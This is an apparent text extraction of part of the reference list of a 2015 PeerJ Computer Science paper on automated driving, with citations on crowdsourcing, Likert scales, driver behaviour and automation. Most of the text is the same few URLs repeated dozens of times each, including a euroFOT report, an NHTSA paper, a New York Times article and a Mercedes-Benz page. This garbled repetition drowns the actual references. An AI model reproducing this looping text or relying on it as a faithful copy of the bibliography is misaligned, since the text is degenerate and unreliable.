http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www.eurofot-ip.eu/download/library/deliverables/eurofotsp120121212v11dld113_final_report.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://www-nrd.nhtsa.dot.gov/pdf/ESV/esv21/09-0460.pdf http://dx.doi.org/10.7717/peerj-cs.13 Kittur A, Chi EH, Suh B. 2008. Crowdsourcing user studies with Mechanical Turk. In: Proceedings of the SIGCHI conference on human factors in computing systems. New York: ACM Press, 453–456. Kulas JT, Stachowski AA. 2009. Middle category endorsement in odd-numbered Likert response scales: associated item characteristics, cognitive demands, and preferred meanings. Journal of Research in Personality 43:489–493 DOI 10.1016/j.jrp.2008.12.005. Kulas JT, Stachowski AA, Haynes BA. 2008. Middle response functioning in Likert-responses to personality items. Journal of Business and Psychology 22:251–259 DOI 10.1007/s10869-008- 9064-2. Kyriakidis M, Happee R, De Winter JCF. 2015. Public opinion on automated driving: results of an international questionnaire among 5000 respondents. Transportation Research Part F: Traffic Psychology and Behaviour 32:127–140 DOI 10.1016/j.trf.2015.04.014. Large DR, Burnett GE. 2013. Drivers’ preferences and emotional responses to satellite navigation voices. International Journal of Vehicle Noise and Vibration 9:28–46 DOI 10.1504/IJVNV.2013.053815. Larsson AF, Kircher K, Hultgren JA. 2014. Learning from experience: familiarity with ACC and responding to a cut-in situation in automated driving. Transportation Research Part F: Traffic Psychology and Behaviour 27:229–237 DOI 10.1016/j.trf.2014.05.008. Lee AH, Stevenson MR, Wang K, Yau KKW. 2002. Modeling young driver motor vehicle crashes: data with extra zeros. Accident Analysis & Prevention 34:515–521 DOI 10.1016/S0001-4575(01)00049-5. Lee JD. 2007. Technology and teen drivers. Journal of Safety Research 38:203–213 DOI 10.1016/j.jsr.2007.02.008. Levitan L, Golembiewski G, Bloomfield JR. 1998. Human factors issues for automated highway systems. ITS Journal 4:21–47 DOI 10.1080/10248079808903735. Llaneras RE, Salinger JA, Green CA. 2013. Human factors issues associated with limited ability autonomous driving systems: drivers’ allocation of visual attention to the forward roadway. In: Proceedings of the 7th international driving symposium on human factors in driver assessment, training and vehicle design, Bolton Landing, NY. 92–98. Lumbreras M, Sánchez J, Barcia M. 1996. A 3D sound hypermedial system for the blind. In: Proceedings of the first european conference on disability, virtual reality and associated technologies, Maidenhead, UK. 187–191. Available at http://www.icdvrat.org/1996/papers/1996 22.pdf (accessed 13 July 2015). Markoff J. 2010. Google cars drive themselves, in traffic. The New York Times Available at http:// www.nytimes.com/2010/10/10/science/10google.html (accessed 13 July 2015). Mason W, Suri S. 2012. Conducting behavioral research on Amazon’s Mechanical Turk. Behavior Research Methods 44:1–23 DOI 10.3758/s13428-011-0124-6. Matthews ML, Moran AR. 1986. Age differences in male drivers’ perception of accident risk: the role of perceived driving ability. Accident Analysis & Prevention 18:299–313 DOI 10.1016/0001-4575(86)90044-8. Merat N, Jamson AH, Lai FC, Carsten O. 2012. Highly automated driving, secondary task performance, and driver state. Human Factors 54:762–771 DOI 10.1177/0018720812442087. Mercedes-Benz. 2014. Pre-Safe. Available at http://www2.mercedes-benz.co.uk/content/ unitedkingdom/mpc/mpc unitedkingdom website/en/home mpc/passengercars/home/corporate sales0/fleet/leasing/our advantages/Safety.0009.html (accessed 12 November 2014). Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 26/28 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/j.jrp.2008.12.005 http://dx.doi.org/10.1007/s10869-008-9064-2 http://dx.doi.org/10.1007/s10869-008-9064-2 http://dx.doi.org/10.1016/j.trf.2015.04.014 http://dx.doi.org/10.1504/IJVNV.2013.053815 http://dx.doi.org/10.1016/j.trf.2014.05.008 http://dx.doi.org/10.1016/S0001-4575(01)00049-5 http://dx.doi.org/10.1016/j.jsr.2007.02.008 http://dx.doi.org/10.1080/10248079808903735 http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.icdvrat.org/1996/papers/1996_22.pdf http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://www.nytimes.com/2010/10/10/science/10google.html http://dx.doi.org/10.3758/s13428-011-0124-6 http://dx.doi.org/10.1016/0001-4575(86)90044-8 http://dx.doi.org/10.1177/0018720812442087 http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html http://www2.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales0/fleet/leasing/our_advantages/Safety.0009.html 